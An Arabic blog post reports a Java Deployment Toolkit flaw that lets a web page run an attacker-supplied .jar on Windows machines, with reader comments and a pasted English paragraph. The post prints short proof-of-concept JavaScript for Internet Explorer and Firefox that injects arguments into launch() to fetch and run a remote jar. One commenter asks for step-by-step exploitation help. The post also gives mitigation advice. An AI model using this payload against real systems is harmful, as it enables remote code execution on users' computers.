ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز
اكتشف أحد مهندسي Google ثغرة خطيرة في JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10. بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض النظر عن نوعه طالما جافا منصّبة بالجهاز.
تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.
استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك فعلى الأغلب أنها غير مصابة بهذه الثغرة.
كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:
var o = document.createElement(“OBJECT”);o.classid = “clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA”;
o.launch(“http: -J-jar -J\attacker.controlledexploit.jar none”);
أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:
var o = document.createElement(“OBJECT”);o.type = “application/npruntime-scriptable-plugin;deploymenttoolkit”
document.body.appendChild(o);
o.launch(“http: -J-jar -J\attacker.controlledexploit.jar none”);
بسبب خطأ في طريقة معالجة الدالة launch للرابط الذي وضعه المهاجم, هذا مكّنه من حقن ملف .jar سيتم تمريره الى javaws التي بدورها ستقوم بتشغيله على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة التحديث الخاصة بجافا.
شخصيّاً أجد الثغرة خطيرة جداً لأن Java تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.
مكتشف الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام Firefox مع اضافة NoScript وبهذه الحالة ستكون قادر على التحكم بشكل كامل بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من أغلب ثغرات المتصفح وليس هذه الثغرة فقط.
لمزيد من المعلومات: Full Disclosure mailing list
تجربة تعليق
يعطيك العافيه
تسلم ع الخبر يا عبده
مشكور جدا على التحذير
خاصة و ان الجافا منتشرة بشكل كبير
في عالمنا العربي …
بارك الله فيك أخي عبد المهيمن
تسلم علي الخبر الحصري يا عبد المهيمن
نشكرك كلنا عليه والله يا اخي
During the last few years, the number of vulnerabilities being discovered in applications is far greater than the number of vulnerabilities discovered in operating systems. As a result, more exploitation attempts are recorded on application programs. The most “popular” applications for exploitation tend to change over time since the rationale for targeting a particular application often depends on factors like prevalence or the inability to effectively patch. Due to the current trend of converting trusted web sites into malicious servers, browsers and client-side applications that can be invoked by browsers seem to be consistently targeted.
Application Vulnerabilities Exceed OS Vulnerabilities
مشكور اخي عبدالمهيمن لكن اخي ياليت تشرط طريقة استغلال هذه الثغره في المتصفح Internet Explorer نريد الخطوات بصراحه لاني مبتدئ في هذا النوع من الاختراقات ياليت تطول بالك علينا بس وتتحملنا وفقك الله
اقصد تشرح لنا الطريقه
بارك الله فيك
شكرا اخي انا اريد حمايت جهازي من المتطفلين اخي لقد عرفو رمز ip كيف اغيره
ممكن تساعدني